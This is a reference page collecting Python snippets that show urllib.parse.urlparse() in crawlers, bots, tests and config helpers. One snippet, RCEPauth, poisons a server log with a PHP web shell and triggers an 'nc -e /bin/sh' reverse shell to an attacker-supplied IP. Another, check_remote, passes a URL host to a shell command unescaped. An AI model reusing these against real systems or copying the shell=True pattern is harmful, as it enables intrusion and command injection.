The following 50 code examples, extracted from open source Python projects, illustrate how to use urllib.parse.urlparse().
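For reference, here is a minimal sketch of what urlparse() returns; the example URL is purely illustrative:

from urllib.parse import urlparse

# urlparse() splits a URL into six components (scheme, netloc, path,
# params, query, fragment) and returns a ParseResult named tuple.
u = urlparse('https://example.com:8042/over/there?name=ferret#nose')
print(u.scheme)    # 'https'
print(u.netloc)    # 'example.com:8042'
print(u.hostname)  # 'example.com' (lowercased, without the port)
print(u.port)      # 8042
print(u.path)      # '/over/there'
print(u.query)     # 'name=ferret'
print(u.fragment)  # 'nose'
print(u.geturl())  # reassembles the URL from the parsed parts

Most of the examples below combine these attributes: netloc to set a Host header or extract a domain, scheme plus netloc to rebuild absolute URLs, and path or query for routing and parameter parsing.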
def ygdy8_list_page(url, is_index=False):
    """Crawl a ygdy8 movie list page.

    Args:
        url (string): list page url
        is_index (bool): whether this is the index page
    """
    celery_logger.info('ygdy8_list_page url: {}'.format(url))
    try:
        u = urlparse(url)
        response = requests.get(url, headers={'Host': u.netloc})
        html_page = response.content.decode('gbk', 'ignore')
        movies, pages = ygdy8.parse_list_page(html_page, is_index)
        for movie in movies:
            movie_url = '{}://{}{}'.format(u.scheme, u.netloc, movie)
            ygdy8_movie_page.delay(movie_url)
        dir_name = os.path.dirname(u.path)
        for page in pages[1:]:
            page_url = '{}://{}{}/{}'.format(u.scheme, u.netloc, dir_name, page)
            ygdy8_list_page.delay(page_url, False)
    except Exception as exc:
        celery_logger.exception(exc)
def ygdy8_movie_page(url):
    """Crawl a ygdy8 movie detail page.

    Args:
        url (string): movie page url (eg: http://www.ygdy8.net/html/gndy/jddy/20170804/54635.html)
    """
    celery_logger.info('ygdy8_movie_page url: {}'.format(url))
    try:
        sid = calc_md5(url.encode('utf8'))
        record = Entity.get(sid)
        if record:
            return
        u = urlparse(url)
        response = requests.get(url, headers={'Host': u.netloc})
        html_page = response.content.decode('gbk', 'ignore')
        movie = ygdy8.YGDY8(html_page)
        movie.parse_html()
        save_ygdy8_data.delay(sid, url, movie.to_json())
    except Exception as exc:
        celery_logger.exception(exc)
def s80_movie_list(url):
    """Crawl an 80s movie list page.

    Args:
        url (string): list page url
    """
    celery_logger.info('s80_movie_list url: {}'.format(url))
    try:
        u = urlparse(url)
        response = requests.get(url, headers={'Host': u.netloc})
        movies, next_page = s80.parse_list_page(response.text)
        for movie in movies:
            movie_url = '{}://{}{}'.format(u.scheme, u.netloc, movie)
            s80_movie_page.delay(movie_url)
        if next_page:
            next_page_url = '{}://{}{}'.format(u.scheme, u.netloc, next_page)
            s80_movie_list.delay(next_page_url)
    except Exception as exc:
        celery_logger.exception(exc)
def prompt_extractor(self, item):
    extractor = extractors[item.data(Qt.UserRole)]
    inputs = []
    if not assert_installed(self.view, **extractor.get('depends', {})):
        return
    if not extractor.get('pick_url', False):
        files, mime = QFileDialog.getOpenFileNames()
        for path in files:
            inputs.append((path, Path(path).stem))
    else:
        text, good = QInputDialog.getText(self.view, ' ', 'Input an URL:')
        if text:
            url = urlparse(text)
            inputs.append((url.geturl(), url.netloc))
    if inputs:
        wait = QProgressDialog('Extracting .proto structures...', None, 0, 0)
        wait.setWindowTitle(' ')
        self.set_view(wait)
        self.worker = Worker(inputs, extractor)
        self.worker.progress.connect(self.extraction_progress)
        self.worker.finished.connect(self.extraction_done)
        self.worker.start()
def make_next_param(login_url, current_url):
    '''
    Reduces the scheme and host from a given URL so it can be passed to
    the given `login` URL more efficiently.

    :param login_url: The login URL being redirected to.
    :type login_url: str
    :param current_url: The URL to reduce.
    :type current_url: str
    '''
    l = urlparse(login_url)
    c = urlparse(current_url)

    if (not l.scheme or l.scheme == c.scheme) and \
       (not l.netloc or l.netloc == c.netloc):
        return urlunparse(('', '', c.path, c.params, c.query, ''))
    return current_url
def run_webhook(self, webhook_url, **options):
    """
    Convenience method for running bots in webhook mode

    :Example:

    >>> if __name__ == '__main__':
    >>>     bot.run_webhook(webhook_url="https://yourserver.com/webhooktoken")

    Additional documentation on https://core.telegram.org/bots/api#setwebhook
    """
    loop = asyncio.get_event_loop()
    loop.run_until_complete(self.set_webhook(webhook_url, **options))
    if webhook_url:
        url = urlparse(webhook_url)
        app = self.create_webhook_app(url.path, loop)
        host = os.environ.get('HOST', '0.0.0.0')
        port = int(os.environ.get('PORT', 0)) or url.port
        web.run_app(app, host=host, port=port)
def fetch(self, uri, filename):
    if super().needs_login():
        super().perform_login(self.cfg, self.headers)
    parts = urlparse(uri)
    mod_id = parts.netloc
    session = super().getSession()
    r = session.get(
        "http://www.nexusmods.com/skyrim/Files/download/" + mod_id,
        params={"game_id": "110"},
        allow_redirects=True,
        headers=self.headers
    )
    if r.status_code != 200:
        raise RuntimeError("Failed downloading " + uri)
    j = r.json()
    super().download_file(uri, j[0]["URI"], self.headers, filename)
def get_sendgrid_request_message(cfg, keyid, hex, user_email):
    url_prefix = urljoin(
        cfg.config.megserver_hostname_url,
        os.path.join(cfg.config.meg_url_prefix, "revoke")
    )
    params = urlencode([("keyid", keyid), ("token", hex)])
    parsed = list(urlparse(url_prefix))
    parsed[4] = params
    revocation_link = urlunparse(parsed)

    message = Mail()
    message.add_to(user_email)
    message.set_from(cfg.config.sendgrid.from_email)
    message.set_subject(cfg.config.sendgrid.subject)
    message.set_html(EMAIL_HTML.format(keyid=keyid, link=revocation_link))
    return message
def determine_git_domain(origin_url):
    # Handles both SSH and HTTPS
    # No support for relative URL path, only (sub)domain:
    # https://docs.gitlab.com/omnibus/settings/configuration.html
    # HTTPS URLs
    url = urlparse(origin_url)
    if url.netloc:
        return url.netloc
    # SSH URLs
    matchObj = re.search(r'@+(?P<ssh_git_url>.*)?:', origin_url)
    try:
        if matchObj.group('ssh_git_url'):
            return matchObj.group('ssh_git_url')
    except AttributeError:  # no match found
        return None
def get_netloc(url):
    """Return the netloc from a URL.

    If the input value is not a valid URL the method will raise an Ansible
    filter exception.

    :param url: the URL to parse
    :type url: ``str``
    :returns: ``str``
    """
    try:
        netloc = urlparse(url).netloc
    except Exception as exp:
        raise errors.AnsibleFilterError(
            'Failed to return the netloc of: "%s"' % str(exp)
        )
    else:
        return netloc
def get_netorigin(url):
    """Return the network origin (scheme and netloc) from a URL.

    If the input value is not a valid URL the method will raise an Ansible
    filter exception.

    :param url: the URL to parse
    :type url: ``str``
    :returns: ``str``
    """
    try:
        parsed_url = urlparse(url)
        netloc = parsed_url.netloc
        scheme = parsed_url.scheme
    except Exception as exp:
        raise errors.AnsibleFilterError(
            'Failed to return the netorigin of: "%s"' % str(exp)
        )
    else:
        return '%s://%s' % (scheme, netloc)
def check_remote(url):
    # TODO need a better solution
    o = urlparse.urlparse(url)
    host = o.netloc
    # strip userinfo and port from the netloc
    while "@" in host:
        host = host[host.find("@") + 1:]
    while ":" in host:
        host = host[:host.find(":")]
    cmd = list()
    cmd.append("ping")
    if platform.system().lower().startswith("win"):
        cmd.append("-n")
        cmd.append("1")
        cmd.append("-w")
        cmd.append("1000")
    else:
        cmd.append("-c1")
        cmd.append("-t1")
    cmd.append(host)
    p = Popen(" ".join(cmd), stdout=PIPE, stderr=PIPE, shell=True)
    out, err = p.communicate()
    return len(err) == 0
def configure(self):
    opts = self.options
    use_cfg = opts.use_config
    if use_cfg is None:
        return
    url = urlparse(opts.use_config_dir)
    kwargs = {}
    if url.scheme:
        kwargs['download'] = True
        kwargs['remote_url'] = url.geturl()
        # search first with the exact url, else try with +'/wafcfg'
        kwargs['remote_locs'] = ['', DEFAULT_DIR]
    tooldir = url.geturl() + ' ' + DEFAULT_DIR
    for cfg in use_cfg.split(','):
        Logs.pprint('NORMAL', "Searching configuration '%s'..." % cfg)
        self.load(cfg, tooldir=tooldir, **kwargs)
    self.start_msg('Checking for configuration')
    self.end_msg(use_cfg)
def _should_use_proxy(url, no_proxy=None):
    """Determines whether a proxy should be used to open a connection to the
    specified URL, based on the value of the no_proxy environment variable.

    @param url: URL
    @type url: basestring or urllib2.Request
    """
    if no_proxy is None:
        no_proxy_effective = os.environ.get('no_proxy', '')
    else:
        no_proxy_effective = no_proxy

    urlObj = urlparse_.urlparse(_url_as_string(url))
    for np in [h.strip() for h in no_proxy_effective.split(',')]:
        if urlObj.hostname == np:
            return False

    return True
async def generate_path(self, endpoint_desc, session, request_params):
    path = endpoint_desc.get('path', '')
    url = list(urlparse(self.base_path))
    url[2] = '/'.join([url[2].rstrip('/'), path.lstrip('/')])
    url.pop()  # drop the last element so the 5-tuple fits urlunsplit()
    path = urlunsplit(url)
    hooks = [getattr(plugin, 'prepare_path') for plugin in self._plugins
             if hasattr(plugin, 'prepare_path')]
    self.logger.debug("Calling {0} plugin hooks...".format('prepare_path'))
    for func in hooks:
        try:
            path = await func(endpoint_desc=endpoint_desc, session=session,
                              request_params=request_params, path=path)
        except Exception as ex:  # pragma: no cover
            self.logger.error("Exception executing {0}".format(repr(func)))
            self.logger.exception(ex)
            raise
    return path
def RCEPauth(temp):
    global port
    global ip
    outTime(2, "Just hit ctrl + c when asked for a password")
    parsed = urlparse(url)
    sysCMD = "ssh" + " '<pre><?php echo system($_GET['cmd']); exit; ?>'@" + parsed.netloc
    print(sysCMD)
    os.system(sysCMD)
    temp = temp.replace('etc/passwd', 'var/log/auth.log&cmd=')
    if not ip:
        ip = input("Enter your IP address: : ")
    if not port:
        port = input("Enter local port for target to connect back to: ")
    outTime(3, "Remember to start a listener in another shell")
    input("Hit enter when listener is created")
    cmd = "nc+-e+%2Fbin%2Fsh+" + ip + "+" + port
    try:
        r = openURL(temp + cmd, headers)
        outTime(2, "Shell closed")
        print(65 * "-")
    except KeyboardInterrupt:
        sys.exit()
def __init__(self, table="footprints", database_url=os.getenv("DATABASE_URL"),
             geometry_column="geom"):
    if database_url is None:
        raise Exception("Database URL must be provided.")
    urlparse.uses_netloc.append('postgis')
    urlparse.uses_netloc.append('postgres')
    url = urlparse.urlparse(database_url)

    self._pool = ThreadedConnectionPool(
        1, 16,
        database=url.path[1:],
        user=url.username,
        password=url.password,
        host=url.hostname,
        port=url.port)
    self._log = logging.getLogger(__name__)
    self.table = table
    self.geometry_column = geometry_column
def check_urls(self, resources_to_check, results=None, hash_results=None):
    def get_domain(x):
        return urlparse(x[0]).netloc

    if results is None:  # pragma: no cover
        resources_to_check = list_distribute_contents(resources_to_check, get_domain)
        results = retrieve(resources_to_check)
        if self.testsession:
            serialize_results(self.testsession, results)
    hash_check = list()
    for resource_id in results:
        url, err, http_last_modified, hash, force_hash = results[resource_id]
        if hash:
            dbresource = self.session.query(DBResource).filter_by(
                id=resource_id, run_number=self.run_number).one()
            if dbresource.md5_hash != hash:  # File changed
                hash_check.append((url, resource_id, force_hash))
    if hash_results is None:  # pragma: no cover
        hash_check = list_distribute_contents(hash_check, get_domain)
        hash_results = retrieve(hash_check)
        if self.testsession:
            serialize_hashresults(self.testsession, hash_results)
    return results, hash_results
def get_url_query(self, url):
    if not isinstance(url, str):
        url = str(url)
    parsed_url = urlparse(url)
    url_query = parse_qsl(parsed_url.fragment or parsed_url.query)
    # the login response URL query may contain duplicate keys
    url_query = dict(url_query)
    token = self.get_token_from_url(url)
    if token:
        url_query["access_token"] = token
    return url_query
def mdn_cmd(self, listener, sender, target, args):
    arg_list = args.split()
    if len(arg_list) < 1:
        self.messenger.msg(target, "https://developer.mozilla.org/ - Mozilla Developer Network")
        return
    http = urllib3.PoolManager()
    base_url = "https://ajax.googleapis.com/ajax/services/search/web?v=1.0&q="
    mdn_url = "%20site%3Adeveloper.mozilla.org"
    full_url = base_url + args + mdn_url
    o = urlparse(full_url)
    r = http.request("GET", o.geturl())
    pd = json.loads(r.data.decode('UTF-8'))
    firsturl = pd['responseData']['results'][0]['url']
    self.messenger.msg(target, firsturl)
def sendResponse(reportID: str, actionName: str, respURL: str) -> None:
    if actionName == 'body':
        text = getBody(reportID)
    elif actionName == 'metadata':
        text = getMetadata(reportID)
    else:
        raise ValueError("Button %s not defined!" % actionName)
    ephemeralJson = {'response_type': 'ephemeral',
                     'replace_original': False,
                     'text': text}
    # Even if an attacker gets the verification token, we will still refuse
    # to post the data to non-slack.com URLs
    if urlparse(respURL).hostname.endswith('slack.com'):
        requests.post(respURL, json.dumps(ephemeralJson).encode('utf-8'))
    else:
        ephemeralJson['text'] = (('Failed URL check, respURL=%s which is not on the slack.com domain name! This check '
                                  'is theoretically not required (since we verify the verification token), but done as '
                                  'an extra defensive step. To disable this, edit slackServer.py in the project root.')
                                 % respURL)
        requests.post(respURL, json.dumps(ephemeralJson).encode('utf-8'))
        raise URLError("respURL=%s not on slack.com domain!" % respURL)
def parseURL(url: str) -> URLParts:
    """ Parse the given URL into a URLParts named tuple and normalize any
    relevant domain names """
    try:
        parsed = urlparse(url)
        if parsed.hostname:
            hostname = parsed.hostname
        else:
            hostname = ''
        if config.hostnameSanitizers:
            for regex, result in config.hostnameSanitizers.items():
                if re.compile(regex).match(hostname):
                    domain = result
                    break
            else:
                domain = hostname
        else:
            domain = hostname
        return URLParts(domain=domain,
                        path=parsed.path,
                        queries=dict(parse_qsl(parsed.query)))
    except ValueError:
        return None
def isProgramURL(url: str, acceptAll=True) -> bool:
    """ Whether the given url is a program URL """
    domain = urlparse(url).netloc.split(':')[0].lower()
    if not config.domains:
        return True
    if config.domains or (not acceptAll):
        try:
            ip = socket.gethostbyname(domain)
        except (socket.gaierror, UnicodeError):
            ip = None
        if domain and isinstance(config.domains, list):
            return (any([domain.endswith(hostname.lower()) for hostname in config.domains])
                    and ip != '127.0.0.1')
        return False
    if acceptAll:
        return True
def getVulnDomains(self) -> List[str]:
    """ Get a list of the vulnerable domains (used for duplicate detection;
    not an accurate process) """
    def getDomains(urls: List[str]) -> List[str]:
        return [urlparse(url).hostname for url in urls]

    botComments = self._getAllCommentsByUsername(config.apiName)
    reporterComments = ([self.__getBody(x) for x in
                         self._getAllCommentsByUsername(self.getReporterUsername())] +
                        getLinks(self.getReportBody()))
    # First attempt at getting a list of vulnerable domains, see if it is
    # ever set in the metadata
    for botComment in botComments:
        body = self.__getBody(botComment)
        try:
            metadataSection = body.split('Metadata')[-1]
            return getDomains([extractJson(metadataSection)['vulnDomain']])
        except (KeyError, TypeError):
            pass
    allURLs = [link for comment in reporterComments for link in getLinks(comment)]
    # If not, just return the list of all the urls
    return getDomains(allURLs)
def parse_stream_url(self, url):
    logger.debug('Extracting URIs from %s', url)
    extension = urlparse(url).path[-4:]
    if extension in ['.mp3', '.wma']:
        logger.debug('Got %s', url)
        return [url]  # Catch these easy ones
    results = []
    playlist, content_type = self._get_playlist(url)
    if playlist:
        parser = find_playlist_parser(extension, content_type)
        if parser:
            playlist_data = StringIO.StringIO(playlist)
            try:
                results = [u for u in parser(playlist_data)
                           if u and u != url]
            except Exception as exp:  # pylint: disable=broad-except
                logger.error('TuneIn playlist parsing failed %s', exp)
            if not results:
                logger.debug('Parsing failure, '
                             'malformed playlist: %s', playlist)
    elif content_type:
        results = [url]
    logger.debug('Got %s', results)
    return list(OrderedDict.fromkeys(results))
def get_app(self, static_serve=False) -> web.Application:
    """ Create aiohttp application for webhook handling """
    app = get_app(self, static_serve=static_serve)

    # webhook handler
    webhook_path = urlparse(self.webhook).path
    app.router.add_post(webhook_path, self.webhook_handle)

    # viber webhooks registering
    if self._unset_webhook_on_cleanup:
        app.on_cleanup.append(lambda a: a.bot.api.unset_webhook())
    if self._set_webhook_on_startup:
        app.on_startup.append(lambda a: a.bot.set_webhook_on_startup())

    return app
def check_headers(self, headers):
    etag = headers.get('etag')
    if etag is not None:
        if etag.startswith(('W/', 'w/')):
            if etag.startswith('w/'):
                warn(HTTPWarning('weak etag indicator should be upcase.'),
                     stacklevel=4)
            etag = etag[2:]
        if not (etag[:1] == etag[-1:] == '"'):
            warn(HTTPWarning('unquoted etag emitted.'), stacklevel=4)

    location = headers.get('location')
    if location is not None:
        if not urlparse(location).netloc:
            warn(HTTPWarning('absolute URLs required for location header'),
                 stacklevel=4)
def test_valid_file_upload(admin_client):
    task = Task.objects.create(slug='test')
    data = b"a"
    url = reverse('task', kwargs={'task_id': task.id})
    zip_file = SimpleUploadedFile(
        "task1.zip", data, content_type="application/zip")

    response = admin_client.post(url, {'zip_file': zip_file})
    assert response.status_code == 302
    assert urlparse(response.url).path == url

    submissions = TaskSubmission.objects.all()
    assert len(submissions) == 1
    submission = submissions[0]
    with open(submission.get_submission_path(), 'rb') as f:
        assert data == f.read()
def query_params(self, value=None):
    """
    Return or set a dictionary of query params

    :param dict value: new dictionary of values
    """
    if value is not None:
        return URL._mutate(self, query=unicode_urlencode(value, doseq=True))
    query = '' if self._tuple.query is None else self._tuple.query

    # In Python 2.6, urlparse needs a bytestring so we encode and then
    # decode the result.
    if not six.PY3:
        result = parse_qs(to_utf8(query), True)
        return dict_to_unicode(result)

    return parse_qs(query, True)
def dashboard(global_config, **settings):
    """ WSGI entry point for the Flask app RQ Dashboard """
    redis_uri = os.environ.get('REDIS_URL', 'redis://localhost:6379/0')
    p = parse.urlparse(redis_uri)
    host, port = p.netloc.split(':')
    db = len(p.path) > 1 and p.path[1:] or '0'
    redis_settings = {
        'REDIS_URL': redis_uri,
        'REDIS_DB': db,
        'REDIS_HOST': host,
        'REDIS_PORT': port,
    }
    app = Flask(__name__,
                static_url_path="/static",
                static_folder=resource_filename("rq_dashboard", "static"))
    app.config.from_object(rq_dashboard.default_settings)
    app.config.update(redis_settings)
    app.register_blueprint(rq_dashboard.blueprint)
    return app.wsgi_app
def test_auth_url(self):
    perms = ['email', 'birthday']
    redirect_url = 'https://localhost/facebook/callback/'
    expected_url = 'https://www.facebook.com/dialog/oauth?' + urlencode(
        dict(client_id=self.app_id,
             redirect_uri=redirect_url,
             scope=','.join(perms)))
    actual_url = facebook.auth_url(self.app_id, redirect_url, perms=perms)

    # Since the order of the query string parameters might be
    # different in each URL, we cannot just compare them to each
    # other.
    expected_url_result = urlparse(expected_url)
    actual_url_result = urlparse(actual_url)
    expected_query = parse_qs(expected_url_result.query)
    actual_query = parse_qs(actual_url_result.query)

    self.assertEqual(actual_url_result.scheme, expected_url_result.scheme)
    self.assertEqual(actual_url_result.netloc, expected_url_result.netloc)
    self.assertEqual(actual_url_result.path, expected_url_result.path)
    self.assertEqual(actual_url_result.params, expected_url_result.params)
    self.assertEqual(actual_query, expected_query)
def __getDownloadLink(self, link):
    if link == 'SproutCore.xml':
        data = requests.get('http://docs.sproutcore.com/feeds/' + link).text
        e = xml.etree.ElementTree.fromstring(data)
        version = e.findall('version')[0].text
        for atype in e.findall('url'):
            return {'url': atype.text, 'version': version}
    server = self.serverManager.getDownloadServer(self.localServer)
    data = requests.get(server.url + link).text
    e = xml.etree.ElementTree.fromstring(data)
    version = e.findall('version')[0].text
    for atype in e.findall('url'):
        if self.localServer is not None:
            disassembled = urlparse(atype.text)
            filename, file_ext = splitext(basename(disassembled.path))
            url = self.localServer
            if not url[-1] == '/':
                url = url + '/'
            url = url + filename + file_ext
            return {'url': url, 'version': version}
        if atype.text.find(server.url) >= 0:
            return {'url': atype.text, 'version': version}
def fuzz_one(fqdn):
    original = Fqdn.query.filter_by(fqdn=fqdn).first()
    _url = original.fqdn
    # no scheme, assuming HTTP
    if '://' not in _url:
        _url = 'http://' + _url
    url = urlparse(_url)
    fuzzed = DomainFuzz(url.netloc)
    fuzzed.generate()
    checks = {
        'banners': True,
        'geoip': True,
        'whois': True,
        'ssdeep': True,
        'mxcheck': False
    }
    for domain in fuzzed.domains:
        augment.delay(domain, url, original.id, checks)
def _isurl(self, path):
    """Test if path is a net location.  Tests the scheme and netloc."""

    # We do this here to reduce the 'import numpy' initial import time.
    if sys.version_info[0] >= 3:
        from urllib.parse import urlparse
    else:
        from urlparse import urlparse

    # BUG : URLs require a scheme string ('http://') to be used.
    #       www.google.com will fail.
    #       Should we prepend the scheme for those that don't have it and
    #       test that also?  Similar to the way we append .gz and test for
    #       compressed versions of files.

    scheme, netloc, upath, uparams, uquery, ufrag = urlparse(path)
    return bool(scheme and netloc)
def get_type(key, value):
    if type(value) == type([]):
        return 'array'
    value = value[0]
    if value.isdigit():
        return 'int'
    try:
        float(value)
        return 'float'
    except:
        pass
    # url check
    u = urlparse.urlparse(value)
    if u.scheme and u.netloc:
        return 'url'
    try:
        j = json.loads(value)
        if type(j) == type([]) or type(j) == type({}):
            return 'json'
    except:
        pass
    return 'str'
def test_authorize_url(self):
    """
    :return:
    """
    request_params = {
        'client_id': self.client_id,
        'redirect_uri': self.redirect_url,
        "forcelogin": "false"
    }
    parse_result = parse.urlparse(self.oauth2_client.authorize_url)
    query_params = dict(parse.parse_qsl(parse_result.query))
    self.assertEqual(parse_result.hostname, "api.weibo.com")
    self.assertEqual(parse_result.path, "/oauth2/authorize")
    self.assertDictEqual(query_params, request_params)
async def send_tweet_with_media():
    # read the tweet's status
    status = input("status: ")

    path = ""
    while not path and not os.path.exists(path):
        path = input('file to upload:\n')

    # read the most common input formats
    path = urlparse(path).path.strip(" \"'")

    async with aiofiles.open(path, 'rb') as media:
        # optimize pictures if PIL is available
        if PIL:
            media = await process_media(media, path)
        uploaded = await client.upload_media(media,
                                             chunk_size=2**18,
                                             chunked=True)
        media_id = uploaded.media_id
        await client.api.statuses.update.post(status=status,
                                              media_ids=media_id)
def parse_path(self):
    """
    Returns a 6 tuple-based object with the following items:

    ======== === =================================
    Property Pos Meaning
    ======== === =================================
    scheme   0   URL scheme specifier
    netloc   1   Network location part
    path     2   Hierarchical path
    params   3   Parameters for last path element
    query    4   Query component
    fragment 5   Fragment identifier
    ======== === =================================
    """
    return urlparse(self.path)
def check_template(ctx, _, value):
    """
    Checks that the given value is a valid template

    :param ctx: app context
    :param value: the parameter value
    :return:
    """
    if not value:
        # TODO: get list and show
        raise ctx.abort()
    else:
        url = urlparse(value)
        if not url.netloc:
            url = url._replace(netloc='github.com')
        if url.path[-4:] == '.git':
            url = url._replace(path=url.path[:-4])
        path = os.path.join(os.environ['HOME'], '.flactory/templates',
                            url.netloc, url.path)
        if os.path.isdir(path):
            return path
        # TODO: if it doesn't exist, pull it automatically
        repr_name = click.style("[{}] {}".format(url.netloc, url.path[:-4]),
                                bold=True)
        raise ctx.fail(repr_name + " doesn't exist.")
def _getresponse(self, resp):
    if resp.status_code == 202:
        status_url = resp.getheader('content-location')
        if not status_url:
            raise Exception('Empty content-location from server')
        status_uri = urlparse(status_url).path
        resource = Resource(uri=status_uri, api=self._api,
                            logger=self._logger).get()
        retries = 0
        MAX_RETRIES = 3
        resp_status = resource.response.status_code
        while resp_status != 303 and retries < MAX_RETRIES:
            retries += 1
            # poll the status resource again and refresh the status code
            resource = resource.get()
            resp_status = resource.response.status_code
            time.sleep(5)
        if retries == MAX_RETRIES:
            raise Exception('Max retries limit reached without success')
        location = resource.response.getheader('location')
        return Resource(uri=urlparse(location).path, api=self._api,
                        logger=self._logger).get()
    return Response(self, resp)
def file_to_url(self, file_rel_path):
    """Convert a relative file path to a file URL."""
    _abs_path = os.path.abspath(file_rel_path)
    return urlparse.urlparse(_abs_path, scheme='file').geturl()
def download(self, source, dest):
    """
    Download an archive file.

    :param str source: URL pointing to an archive file.
    :param str dest: Local path location to download archive file to.
    """
    # propagate all exceptions
    # URLError, OSError, etc
    proto, netloc, path, params, query, fragment = urlparse(source)
    if proto in ('http', 'https'):
        auth, barehost = splituser(netloc)
        if auth is not None:
            source = urlunparse((proto, barehost, path, params, query, fragment))
            username, password = splitpasswd(auth)
            passman = HTTPPasswordMgrWithDefaultRealm()
            # Realm is set to None in add_password to force the username and
            # password to be used whatever the realm
            passman.add_password(None, source, username, password)
            authhandler = HTTPBasicAuthHandler(passman)
            opener = build_opener(authhandler)
            install_opener(opener)
    response = urlopen(source)
    try:
        with open(dest, 'wb') as dest_file:
            dest_file.write(response.read())
    except Exception as e:
        if os.path.isfile(dest):
            os.unlink(dest)
        raise e

# Mandatory file validation via Sha1 or MD5 hashing.
def parse_url(self, url):
    return urlparse(url)
def main(initial_url, articles_limit, interval, output_file):
    """ Main loop, single thread """
    minutes_estimate = interval * articles_limit / 60
    print("This session will take {:.1f} minute(s) to download {} article(s):".format(minutes_estimate, articles_limit))
    print("\t(Press CTRL+C to pause)\n")
    session_file = "session_" + output_file
    load_urls(session_file)  # load previous session (if any)
    base_url = '{uri.scheme}://{uri.netloc}'.format(uri=urlparse(initial_url))
    initial_url = initial_url[len(base_url):]
    pending_urls.append(initial_url)

    counter = 0
    while len(pending_urls) > 0:
        try:
            counter += 1
            if counter > articles_limit:
                break
            try:
                next_url = pending_urls.pop(0)
            except IndexError:
                break

            time.sleep(interval)
            article_format = next_url.replace('/wiki/', '')[:35]
            print("{:<7} {}".format(counter, article_format))
            scrap(base_url, next_url, output_file, session_file)
        except KeyboardInterrupt:
            input("\n> PAUSED. Press [ENTER] to continue...\n")
            counter -= 1

    print("Finished!")
    sys.exit(0)
def __getattr__(self, item):
    if item == 'layers':
        if not self._layers:
            return [self.path]
        return [self.path + '/' + l for l in self._layers]
    elif item == 'qualified_name':
        url = urlparse(self.url)
        return ('{url.netloc}{url.path}'
                .format(url=url)
                .replace('@', '.')
                .replace(':', '.')
                .replace('/', '.')
                .replace('*', '.'))